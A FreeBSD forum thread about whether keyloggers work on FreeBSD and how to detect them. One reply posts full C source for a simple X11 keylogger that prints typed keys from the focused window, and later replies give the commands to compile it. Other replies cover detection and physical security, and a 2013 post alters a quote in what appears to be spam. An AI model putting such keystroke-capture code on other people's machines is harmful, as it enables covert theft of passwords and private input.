# keylogger for FreeBSD



## mfaridi (Apr 25, 2010)

can keylogger work on FreeBSD and print everything we do ?
Can I find best packages for detect keylogger ?


----------



## SirDice (Apr 25, 2010)

Yes, a keylogger is possible.

security/rkhunter may be able to find one.


----------



## expl (Apr 25, 2010)

If it is a custom keylogger automated tools have low chance of detecting them.


----------



## lme@ (Apr 26, 2010)

This is a simple keylogger example:

```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>


static Display *dpy;
static Window focuswin = None;

static void attach_to_focuswin(void) {
        int foo = 0;

        XGetInputFocus(dpy, &focuswin, &foo);

        if (focuswin != None)
                XSelectInput(dpy, focuswin, KeyPressMask | FocusChangeMask);
        else
                sleep(1);
}

static void handle_event(void) {
        XEvent ev;
        char buf[100];
        int len;

        XNextEvent(dpy, &ev);
        if(ev.xany.type == FocusOut)
                focuswin = None;
        else if (ev.xany.type == KeyPress) {
                len = XLookupString(&ev.xkey, buf, 99, 0, 0);
                buf[len] = 0;
                printf("%s", buf);
                fflush(stdout);
        }
}

int main(void) {
        dpy = XOpenDisplay(getenv("DISPLAY"));
        if (dpy == NULL) {
                fprintf(stderr, "cannot change display\n");
                exit(1);
        }
        while (1) {
                if (focuswin == None)
                        attach_to_focuswin();
                else
                        handle_event();
        }
}
```


----------



## mfaridi (Apr 26, 2010)

lme@ said:
			
		

> This is a simple keylogger example:
> 
> ```
> #include <stdio.h>
> ...



my experience about programming and shell script is so low , can you describe what can do this script ?


----------



## SirDice (Apr 26, 2010)

mfaridi said:
			
		

> can you describe what can do this script ?


If I'm not mistaken it's C source code for an Xorg keylogger :e

Why are you worried about keyloggers? If an attacker is able to install one you have way more serious problems to worry about.


----------



## lme@ (Apr 26, 2010)

mfaridi said:
			
		

> my experience about programming and shell script is so low , can you describe what can do this script ?



You need to compile this with a C compiler and start it. Then it logs everything you type in X.


----------



## mfaridi (Apr 26, 2010)

lme@ said:
			
		

> You need to compile this with a C compiler and start it. Then it logs everything you type in X.



I am sure this is hard request 
but How I can compile with C compiler and after that use it ?


----------



## SirDice (Apr 26, 2010)

mfaridi said:
			
		

> but How I can compile with C compiler and after that use it ?


If you're asking this then this code is not for you. 

Beware that lme@ gave you an _example_ of a keylogger on FreeBSD. You asked if it was possible and it certainly is.


----------



## mfaridi (Apr 26, 2010)

SirDice said:
			
		

> If you're asking this then this code is not for you.
> 
> Beware that lme@ gave you an _example_ of a keylogger on FreeBSD. You asked if it was possible and it certainly is.



Ok 
I understand
but I want have some experience with compile this script with C compiler


----------



## z662 (Apr 27, 2010)

To compile it, just run 
	
	



```
gcc [insert name of program here]
```

Obviously you should omit the brackets  e.g.   
	
	



```
gcc keyLogger.c
```


----------



## z662 (Apr 27, 2010)

Just out of curiosity, why did you post this thread in the Firewalls section?


----------



## mfaridi (Apr 27, 2010)

z662 said:
			
		

> To compile it, just run
> 
> 
> 
> ...



I run that and I see this error

```
ky.c:4:22: error: X11/Xlib.h: No such file or directory
ky.c:5:27: error: X11/Intrinsic.h: No such file or directory
ky.c:8: error: expected '=', ',', ';', 'asm' or '__attribute__' before '*' token
ky.c:9: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'focuswin'
ky.c: In function 'attach_to_focuswin':
ky.c:14: error: 'dpy' undeclared (first use in this function)
ky.c:14: error: (Each undeclared identifier is reported only once
ky.c:14: error: for each function it appears in.)
ky.c:14: error: 'focuswin' undeclared (first use in this function)
ky.c:16: error: 'None' undeclared (first use in this function)
ky.c:17: error: 'KeyPressMask' undeclared (first use in this function)
ky.c:17: error: 'FocusChangeMask' undeclared (first use in this function)
ky.c: In function 'handle_event':
ky.c:23: error: 'XEvent' undeclared (first use in this function)
ky.c:23: error: expected ';' before 'ev'
ky.c:27: error: 'dpy' undeclared (first use in this function)
ky.c:27: error: 'ev' undeclared (first use in this function)
ky.c:28: error: 'FocusOut' undeclared (first use in this function)
ky.c:29: error: 'focuswin' undeclared (first use in this function)
ky.c:29: error: 'None' undeclared (first use in this function)
ky.c:30: error: 'KeyPress' undeclared (first use in this function)
ky.c: In function 'main':
ky.c:39: error: 'dpy' undeclared (first use in this function)
ky.c:45: error: 'focuswin' undeclared (first use in this function)
ky.c:45: error: 'None' undeclared (first use in this function)
```


----------



## z662 (Apr 27, 2010)

Well you first need to grab your copies of the Xll header files that you are including.  That should get you pointed in the right direction


----------



## expl (Apr 27, 2010)

`cc -o keylogger -I/usr/local/include -L/usr/local/lib -lX11 source.c`


----------



## mfaridi (Apr 28, 2010)

expl said:
			
		

> `cc -o keylogger -I/usr/local/include -L/usr/local/lib -lX11 source.c`



Can you little describe this


----------



## Beastie (Apr 28, 2010)

gcc(1)


----------



## janerysong (Nov 11, 2013)

SirDice said:
			
		

> If I'm not mistaken it's C source code for an Xorg keylogger :e
> 
> Why are you worried about keyloggers? If an attacker is able to install one you have way more serious problems to worry about.



keyloggers are hard to detect manually .You will not notice the presence of such program. It is invisible in the Task List (when you press Ctrl-Alt-Del). It will not show in Task Bar, let alone your Desktop. It does not make any noise, your system will not slow down as in the case of spyware.


----------



## janerysong (Nov 11, 2013)

expl said:
			
		

> If it is Myjad keylogger automated tools have low chance of detecting them.



Scan Virus then install an anti keylogger software then change your password.


----------



## kpa (Nov 11, 2013)

@@janerysong. This thread is about keyloggers under the FreeBSD operating system and you're referring Microsoft Windows in what you posted. I see that you are new here but please pay more attention when replying to threads that are over three years old and stay on topic.


----------



## zspider (Nov 20, 2013)

If someone has gotten far enough that they've been able to install a keylogger, it's likely that's the least of your worries. Physical security is a must.


----------



## marwis (Nov 20, 2013)

Also, software keyloggers are not the only ones to worry about.  Hardware keyloggers are orders of magnitude harder to detect.  With some, it might be not possible at all to detect them from the operating system point of view.

You could install webcams to have 360-degree view of your system and make sure 1. nothing is being attached, and 2. your recordings are not being altered with.  Still then, you wouldn't have 100% assurance that you are "secure".

I'm turning my paranoid mode off now :h .


----------

